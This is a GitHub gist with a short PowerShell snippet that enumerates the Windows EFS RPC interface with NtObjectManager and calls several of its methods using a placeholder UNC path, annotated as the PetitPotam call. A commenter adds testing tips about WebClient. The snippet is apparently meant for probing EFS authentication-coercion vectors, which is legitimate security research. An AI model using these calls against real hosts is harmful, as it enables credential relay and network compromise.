Skip to content

Instantly share code, notes, and snippets.

Created July 30, 2021 21:47
  • Star 11 You must be signed in to star a gist
  • Fork 4 You must be signed in to fork a gist
Star You must be signed in to star a gist
What would you like to do?
Install-Module NtObjectManager
Import-Module NtObjectManager
$Servers = Get-RpcServer -Path C:\Windows\system32\efssvc.dll `
-DbgHelpPath 'C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\dbghelp.dll'
$EfsInterace = $Servers | Where-Object { $_.InterfaceId -eq 'df1941c5-fe89-4e79-bf10-463657acf44d' }
$client = Get-RpcClient -Server $EfsInterace
$ret = $client.EfsRpcOpenFileRaw( "\\\asdf\asdf",1) # <-- What PetitPotam uses
$ret = $client.EfsRpcEncryptFileSrv( "\\\asdf\asdf")
$ret = $client.EfsRpcDecryptFileSrv( "\\\asdf\asdf",0)
$ret = $client.EfsRpcQueryUsersOnFile( "\\\asdf\asdf")
$ret = $client.EfsRpcQueryRecoveryAgents("\\\asdf\asdf")
Copy link

Dont forget to turn on webclient to test this :) Also you need to either reset webclient or wait 30 seconds between subsequent hung tests.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment